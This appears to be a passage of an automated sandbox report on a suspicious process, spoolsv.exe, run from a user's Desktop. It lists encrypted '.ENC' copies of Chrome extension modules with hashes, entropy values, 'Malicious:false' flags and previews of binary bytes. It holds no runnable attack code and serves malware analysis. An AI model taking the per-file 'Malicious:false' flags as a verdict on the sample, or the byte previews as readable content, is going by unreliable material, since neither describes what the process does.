                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%RL....b..R.G...n.h....2....w....r...M..<.6..)!....P....)..'...Ty:?....0......J...I|[.W..T..r.....=G.........F..SyF.....=3.1.......~.K.......D_A...T!.....:..x^6f.=...?l.!...db

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\acro-web2pdf.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14400
                                                                                                                                                                                                                                                      Entropy (8bit):7.9881942407002136
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:R4WWdvaS9dH0NhUk5jHwFKlEwJ6m2PMjBkfeuHJQBuFHSRE:Rgv5HOh1hHwFSEwJ6mwMdkfeKQBuFy+
                                                                                                                                                                                                                                                      MD5:555E08B7D54D4E97267F64A3C39B0A30
                                                                                                                                                                                                                                                      SHA1:408F046D0C15A517AF8E12649EF09557DF1E71C7
                                                                                                                                                                                                                                                      SHA-256:840338FFF375257758F9A90944E907A0E2AF1A7FCEB7E9443FB7678D248270F8
                                                                                                                                                                                                                                                      SHA-512:BD78F608DEA4CF06F1E2D866D0C90FE4C5F72D319068D183679C72BF55E451B97FC66F7F19468F6845703EF84CF4F7B334E46E5FEDF8DC92A9FAB3307192A988
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%RL....b..R.G...n.h....2....w....r...M..<.6..)!....P....)..'...Ty:?....0......J...I|[.W..T.~..L..t.q.-Q.E.Gb..N.\...I..@sS.....1.f....>.p}....G.*..8.....\`..t%...?zr..zFl..ie

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\common.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10016
                                                                                                                                                                                                                                                      Entropy (8bit):7.978580720145245
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:R0LdWhIdmN4aZkYFRadHgLzQJMzivmNHRrEuKO4qGYSOKviGca9GJZAB:R4WWdG94kMOlxrxr4qGR6Dzo
                                                                                                                                                                                                                                                      MD5:4F2AD2F9615395A3A93831E8F762001F
                                                                                                                                                                                                                                                      SHA1:67128135696610AF90C326799BB87D0AF84F5300
                                                                                                                                                                                                                                                      SHA-256:E10A9EE9CA74C1006669ADF81BD2671F51EF624E1648BBEAC23CBCBEC806767F
                                                                                                                                                                                                                                                      SHA-512:6EBB95A61FA44C8B558C0B2CC547030D2E03255607977D61F34607F9E94B33E31EEF6757F51ADC7B035984D4C419357B96DDAEDBB6C29EE072D69E81B55BE56E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R#;..3.h....&.e.U=..%s8.pA...)c.T.J..0..O..Bh..cx.._..y.ns.X..%.p.k.\>..`...Gk(/..i.............nV.c....K.N...Oj.......|....LS0...YQ.&...Yd:&..@B^. ...Cb....6...1.....s.M....I....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\communicate.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16352
                                                                                                                                                                                                                                                      Entropy (8bit):7.988926785420552
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:R4WWdSaepk8i2Ac3rFUDmvn/BsSEcog8FReblKyLyjxdpA:RgMpk8igFl/BScooxKyLijpA
                                                                                                                                                                                                                                                      MD5:6913BF019629CBAFF0A1A88B00D1D8F9
                                                                                                                                                                                                                                                      SHA1:AE533F7B5C5FB9738FF181C503F8D051D729EBC6
                                                                                                                                                                                                                                                      SHA-256:507AD196A296BBB96DA49739D9B896C8C203C54BE09C8C0F9FF6BA42F7ABCE94
                                                                                                                                                                                                                                                      SHA-512:4D0DCF1E1EE602EBDF02833741BD9C831F499D92BD0E6AC00EBA5B44E4F56A289ACAAD78A990A571FB25594FDCD26409BD0D9733750B0F7540E6109669396249
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R#;..3.h....&.e.U=..%s8.pA...)c..X..'.7.o.l#.)6.a.[..i.x...1..7..8.=.d.E.^....jg.3.h..#.GP......D.ef.F....d.|....U%v..Q..h.:.=.e..\5..i=m?.\eA.....G.Y..I....U...p.9F.....`.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\constant.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1824
                                                                                                                                                                                                                                                      Entropy (8bit):7.890588876675563
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooP/94F81xClGXca9+meXFe+Br+TZvTXl:ZP0UmdWhIooP/v1DXca9+meXFj+TZv5
                                                                                                                                                                                                                                                      MD5:3E993F99982081EFE1DBFC4C278A933F
                                                                                                                                                                                                                                                      SHA1:5A9C9F873985C4422B7EDBBA258AEC5FD9DBB9DB
                                                                                                                                                                                                                                                      SHA-256:6DE7C937D5632C6835086059483EAF07634D85A48677B370B5487FD4E0030532
                                                                                                                                                                                                                                                      SHA-512:E0F46478ECCEA8CEB5495EA5E9A26F582700F633312B440E7DD4A44EDB350ABDC1F822726DE3F0F3D0396EAA5FF4FAC24714C0CCBC725D0FB17D2C6779861DF0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'X.!|.2'....:..=....i.E.e....0..2.m....7..4..)..w.9J..R..A....nS.j^.'D|........2....k.T./4z>AU.,.G.......x.D....E..?.......>...5<S.d..e.8mZ..$.g..oF(.......0.y.x./.u..vz..6..li..[~......0L

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\feat.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2528
                                                                                                                                                                                                                                                      Entropy (8bit):7.930082260206733
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooPZ+Soeo0Qzt9GSP+C+gEYEQBn18e0bXG0rsd2mFfE:ZP0UmdWhIooPcaAnGo7GQB14q0Ad2mF8
                                                                                                                                                                                                                                                      MD5:470D52C1BB8360C8267C0C0547E5C443
                                                                                                                                                                                                                                                      SHA1:BAF90120B4D15EED305A9F66F2A2B9A4EB345C3D
                                                                                                                                                                                                                                                      SHA-256:296E4817399334B339D20AB42D89FFF5A36FF073713D85467A6FE16B6DA443A2
                                                                                                                                                                                                                                                      SHA-512:DD3B8629DF207012E9815A960AAECBC2E4CF65F8E6FF82302CA2030EDC96750A0AAF63F247CA76133F23BF9B598FD0F1BA80B5EE587DCE3D69C8CC85410C51BA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R.8T....~..".....e.A3....2..wO!.2...n0..8.......L....."}....P.c....dHX-......V.}..a.h...A$......Z.Y. h.o............6.p..`~..*..nt.. ....W.[rs.QT.P..`...2..........S.G-....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\floodgate.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4512
                                                                                                                                                                                                                                                      Entropy (8bit):7.9631390532110915
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:ZP0UmdWhIooPB7owu4P6xo/HJaa7k+MY4JbTaygteuGw2phmuJid0+5LZ:R0LdWhIdp8s4uEYgbOyAew2TmWwLZ
                                                                                                                                                                                                                                                      MD5:AF065438FC3FDE2ACDEFA07F48D63C20
                                                                                                                                                                                                                                                      SHA1:17E462066AD914AD7E9A18A95A0AEB944221D472
                                                                                                                                                                                                                                                      SHA-256:81F18936760601B694D95FAA924C3C736794DF323E31380AC7BED05D4FFDE8F3
                                                                                                                                                                                                                                                      SHA-512:91ECC22E032939D2B3AD37F36E56FAEE97D1D21B0E5A2BAA020FA8C6AA597A06AB257B0166778C02A08AA3A064A2DB66A94AA8C5B93947CD354D71E79D9FBCD0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R..yb3.\.4..eG....z..K..]Jpr{..".c/..T....Ai...f...T....rcF.F.v.Z.....~.[v^.I.\&w..#..}....Z...wW..S.$..n......:.....gh..w.H#./w..dy..f......8.JJ....1Vh....}..7......0....7..V

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\hydrate.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1584
                                                                                                                                                                                                                                                      Entropy (8bit):7.890164208616487
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooPZmfhok2eHnwmsMkgD:ZP0UmdWhIooPYfHjHn3sG
                                                                                                                                                                                                                                                      MD5:83CB783C28A5AFD014FAFED84D5B6EA4
                                                                                                                                                                                                                                                      SHA1:BBCABA97DD4AED09F23B408571B70B31885E4ABF
                                                                                                                                                                                                                                                      SHA-256:6C439E07FF326293BFBA0BE53E728898431D05D282C8698514D3511D37800C21
                                                                                                                                                                                                                                                      SHA-512:20DAAE757F91070B87EA92F23CDE91C1AC40BF4B0C9DB76F0B38A8539B2D426BD021D2CDF384D4B4C1CDA7EC3E29819B35FF7B01BE8F88696585A51628457283
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R?M.....he.tB.vOf...;..!...J5.<u.......kO..q..(.N.........n..'*.l.8..o<%1\I....Z..C."....yrn.....EO)06....0@..5.q...,_....D.;(1....#....;.g..)....<."...g.....7.Qr..G..m.-.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\polyfills.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2512
                                                                                                                                                                                                                                                      Entropy (8bit):7.934066695516227
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooPbI0PsxJYaClPJlTR8XFk0H+n+h0oFw3X:ZP0UmdWhIooPbFkxJYfblGOGw3X
                                                                                                                                                                                                                                                      MD5:60893A45091E294C9CE844F95CCB63C2
                                                                                                                                                                                                                                                      SHA1:3D567D0856CCA79F54B1D121FF7BD457BFA9CE44
                                                                                                                                                                                                                                                      SHA-256:19242A3323972656704A8902E6E81A675C65201B078D4A4FD3A17466451C5223
                                                                                                                                                                                                                                                      SHA-512:730792422BFA44EA8ED3074AC48B67DA09B090D8187AC2F76E597875106229F65C4964AAA970A5DA237E3CAC6FD66974F48616FD31E8A77DC8793F7502F36D40
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'V]3..w's#.]u..8..h....f.....s.;m..[........JE.D*!..'..F..x.T..W..j.Rr......@x.vO.....F...[..&...F^....J..(.,@\].@..X...._y..'=q...O..F......n+w.E....x...>......I..Z..%_?}...@.g./...e....}.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\private-api.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1168
                                                                                                                                                                                                                                                      Entropy (8bit):7.840288392574895
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:Z7D/D47zTPIfck8NTDWDyxBxeeX875pchY/kv+OtlWnyHKNoLgQs0:ZP/D4rQkk8dWABEIooPPHvci
                                                                                                                                                                                                                                                      MD5:73CC6DC5D1ECF7EC1F50A7E71C884501
                                                                                                                                                                                                                                                      SHA1:BE424E837B4C1A91ACF440FA9332CFD0852C5DDD
                                                                                                                                                                                                                                                      SHA-256:A11CA22619A44248DE8F15B066072C48C1BD305676022D144A08DA89D9EAA45D
                                                                                                                                                                                                                                                      SHA-512:5AAB68774AF199665A42FFA9E116D1D826D87032DFE177587919075269992C256EB2482F4C94F9F60000E44D28928F9F19FBB7781F2EACE94E611E7BD51986B0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'V]3..w's#.]u..8.8".[~\..Mf...@.1#...V.;.......rUmW.v..: .N..5C.F...T[O.!..rW..:.V[?).4.x..(.P.h\Rf.A.?'..........T`..........B;.9..".?..u.$...N..x"..yJ..$2q..&.y.Q..j...n..{...r..t.i...Y..I.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\proxy.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2048
                                                                                                                                                                                                                                                      Entropy (8bit):7.918116949383242
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooPZx0nQRzUlIaoba8qTGd9Up+vLvy+jga:ZP0UmdWhIooP/WQRzPK8q6Jrqa
                                                                                                                                                                                                                                                      MD5:98FD44A81CF41CD07DABCD8E78C934AB
                                                                                                                                                                                                                                                      SHA1:1FCF5B089ABCB8D2B8BBC9703730AE80DFA75761
                                                                                                                                                                                                                                                      SHA-256:D2027B32CCC989C339CB4127120F8497F3857C4E6C77E63F34A3189EBC15C960
                                                                                                                                                                                                                                                      SHA-512:7893351A4B3BFE6D51CA62E709E3B9C78E96FD10B4C57EBA9CD26156A166E77990CC094671614819A3892333A398B61AED3833176702B02B6C7FBC89F6D0EECD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R#;..3.h....&.e..aHp..Q....3..0.7x....5A3.+.".y....4.lSa.....:.*..{.1.p...D.....b4.wh...r.p.pf..........R.....0.P...Y.V1j.)....S|.o.KA.....u.8.#c...w...}......D). ....[.D.J..r

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\session.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):9344
                                                                                                                                                                                                                                                      Entropy (8bit):7.980224195616834
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:R0LdWhIdeYum/RikNB/q06Vtq6AVA0KAxTXwDWlh6xAj:R4WWdeYum/HNB/b627VwgXwDMICj
                                                                                                                                                                                                                                                      MD5:CDD6E1CBED50F6EB7AF816A6A208A75F
                                                                                                                                                                                                                                                      SHA1:35CEADB4D4825B49C2AEA9EB8B4070DA3F30F3D1
                                                                                                                                                                                                                                                      SHA-256:6176E1C58339E2A9A3D632D8FF79F9644B87A56843253A9D43B312E130EE9230
                                                                                                                                                                                                                                                      SHA-512:55F543ECBE46E7FD8AEF8526150F8E3F8D2C4FC21C5E71B3BB1C80B5350636D540A6224B4ACA6EAACF432679ECFBFDFB9348C646BA8518F8EDA87E82849BADEC
                                                                                                                                                                                                                                                      Malicious:false
